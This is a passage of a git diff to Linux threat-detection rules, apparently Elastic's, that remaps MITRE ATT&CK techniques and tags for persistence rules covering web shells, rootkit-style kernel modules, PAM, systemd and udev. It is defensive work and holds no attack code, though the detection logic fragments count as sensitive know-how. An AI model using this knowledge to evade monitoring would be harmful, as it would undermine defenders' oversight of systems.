@@ id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_systemd_service_started.toml b/rules/linux/persistence_systemd_service_started.toml index 142f84b49eb..4d7bc96589f 100644 --- a/rules/linux/persistence_systemd_service_started.toml +++ b/rules/linux/persistence_systemd_service_started.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/17" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [transform] [[transform.osquery]] @@ -164,7 +164,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -193,19 +201,19 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -221,9 +229,10 @@ name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/persistence_systemd_shell_execution.toml b/rules/linux/persistence_systemd_shell_execution.toml index 2c91b1b2964..634b59f4e98 100644 --- a/rules/linux/persistence_systemd_shell_execution.toml +++ b/rules/linux/persistence_systemd_shell_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -78,7 +78,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -91,19 +99,19 @@ process.parent.command_line == "/sbin/init" and process.args_count >= 2 framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -119,6 +127,6 @@ name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_tainted_kernel_module_load.toml b/rules/linux/persistence_tainted_kernel_module_load.toml index 39f39886aa1..367963adfec 100644 --- a/rules/linux/persistence_tainted_kernel_module_load.toml +++ b/rules/linux/persistence_tainted_kernel_module_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/23" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -75,7 +75,14 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" query = ''' @@ -105,16 +112,11 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml b/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml index 423e1b87ade..b1e5e98060a 100644 --- a/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml +++ b/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -76,7 +76,14 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -102,3 +109,16 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_udev_rule_creation.toml b/rules/linux/persistence_udev_rule_creation.toml index d4279c8b34f..b58e6b0f925 100644 --- a/rules/linux/persistence_udev_rule_creation.toml +++ b/rules/linux/persistence_udev_rule_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -128,16 +128,16 @@ file.path like ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.017" -name = "Udev Rules" -reference = "https://attack.mitre.org/techniques/T1546/017/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml b/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml index 87713a3d441..6d45ba99f78 100644 --- a/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml +++ b/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -112,7 +112,43 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_unusual_exim4_child_process.toml b/rules/linux/persistence_unusual_exim4_child_process.toml index 74a2dd1de26..1b804697747 100644 --- a/rules/linux/persistence_unusual_exim4_child_process.toml +++ b/rules/linux/persistence_unusual_exim4_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -58,7 +58,14 @@ references = [ risk_score = 21 rule_id = "6eb862bb-013d-4d4f-a14b-341433ca1a1f" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -73,27 +80,20 @@ not process.name:( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/persistence_unusual_pam_grantor.toml b/rules/linux/persistence_unusual_pam_grantor.toml index 3cc6949feda..962c7bb3a3f 100644 --- a/rules/linux/persistence_unusual_pam_grantor.toml +++ b/rules/linux/persistence_unusual_pam_grantor.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/06" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -65,7 +65,15 @@ Add Auditd Manager For this detection rule to trigger, no additional configuration is required. """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Auditd Manager", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Data Source: Auditd Manager", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -77,19 +85,14 @@ auditd.data.grantors:(* and not (pam_rootok or *pam_cap* or *pam_permit*)) framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.003" -name = "Pluggable Authentication Modules" -reference = "https://attack.mitre.org/techniques/T1556/003/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -99,15 +102,11 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.003" -name = "Pluggable Authentication Modules" -reference = "https://attack.mitre.org/techniques/T1556/003/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.new_terms] field = "new_terms_fields" value = ["auditd.data.grantors"] diff --git a/rules/linux/persistence_unusual_sshd_child_process.toml b/rules/linux/persistence_unusual_sshd_child_process.toml index 92d8b579227..9acdc41ffa3 100644 --- a/rules/linux/persistence_unusual_sshd_child_process.toml +++ b/rules/linux/persistence_unusual_sshd_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -53,7 +53,15 @@ references = ["https://hadess.io/the-art-of-linux-persistence/"] risk_score = 21 rule_id = "4c3c6c47-e38f-4944-be27-5c80be973bd7" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -69,6 +77,24 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" @@ -79,6 +105,16 @@ id = "T1021.004" name = "SSH" reference = "https://attack.mitre.org/techniques/T1021/004/" +[[rule.threat.technique]] +id = "T1563" +name = "Remote Service Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/" + +[[rule.threat.technique.subtechnique]] +id = "T1563.001" +name = "SSH Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/001/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" @@ -87,15 +123,11 @@ reference = "https://attack.mitre.org/tactics/TA0008/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/persistence_user_or_group_creation_or_modification.toml b/rules/linux/persistence_user_or_group_creation_or_modification.toml index 9464079f355..989aedbc3a6 100644 --- a/rules/linux/persistence_user_or_group_creation_or_modification.toml +++ b/rules/linux/persistence_user_or_group_creation_or_modification.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/20" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -110,16 +110,6 @@ event.action in ("changed-password", "added-user-account", "added-group-account- [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" - [[rule.threat.technique]] id = "T1136" name = "Create Account" diff --git a/rules/linux/persistence_web_server_sus_child_spawned.toml b/rules/linux/persistence_web_server_sus_child_spawned.toml index e1fcf81978d..9bf48a74d57 100644 --- a/rules/linux/persistence_web_server_sus_child_spawned.toml +++ b/rules/linux/persistence_web_server_sus_child_spawned.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -82,7 +82,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -184,6 +193,24 @@ from logs-endpoint.events.process-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -203,16 +230,11 @@ reference = "https://attack.mitre.org/tactics/TA0002/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_web_server_sus_command_execution.toml b/rules/linux/persistence_web_server_sus_command_execution.toml index f18d9334015..bd1fd7cbd10 100644 --- a/rules/linux/persistence_web_server_sus_command_execution.toml +++ b/rules/linux/persistence_web_server_sus_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -89,7 +89,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -169,6 +178,24 @@ from logs-endpoint.events.process-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -183,3 +210,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_web_server_sus_destination_port.toml b/rules/linux/persistence_web_server_sus_destination_port.toml index 9927329fab5..1c274eb2f45 100644 --- a/rules/linux/persistence_web_server_sus_destination_port.toml +++ b/rules/linux/persistence_web_server_sus_destination_port.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -80,7 +80,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -105,12 +114,48 @@ not cidrmatch(destination.ip, "127.0.0.0/8", "::1","FE80::/10", "FF00::/8", "10. [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +name = "Persistence" +id = "TA0003" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat.technique]] -id = "T1571" -name = "Non-Standard Port" -reference = "https://attack.mitre.org/techniques/T1571/" +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Execution" +id = "TA0002" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] -id = "TA0011" name = "Command and Control" +id = "TA0011" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat.technique]] +name = "Application Layer Protocol" +id = "T1071" +reference = "https://attack.mitre.org/techniques/T1071/" diff --git a/rules/linux/persistence_web_server_unusual_command_execution.toml b/rules/linux/persistence_web_server_unusual_command_execution.toml index 3b19de7ec1c..e8c298819bd 100644 --- a/rules/linux/persistence_web_server_unusual_command_execution.toml +++ b/rules/linux/persistence_web_server_unusual_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -51,7 +51,15 @@ This rule detects shells invoked by web server processes on Linux to run one-off risk_score = 47 rule_id = "65f28c4d-cfc8-4847-9cca-f2fb1e319151" severity = "medium" -tags = ["Domain: Endpoint", "Domain: Web", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Web", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -89,6 +97,24 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -108,19 +134,15 @@ reference = "https://attack.mitre.org/tactics/TA0002/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [rule.new_terms] field = "new_terms_fields" value = ["process.command_line"] diff --git a/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml b/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml index 6eae96657f5..cfc4377bf4d 100644 --- a/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml +++ b/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -85,7 +85,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -118,6 +126,21 @@ file.path : ("/usr/lib/yum-plugins/*", "/etc/yum/pluginconf.d/*") and not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.016" +name = "Installer Packages" +reference = "https://attack.mitre.org/techniques/T1546/016/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" @@ -127,3 +150,11 @@ reference = "https://attack.mitre.org/techniques/T1574/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml 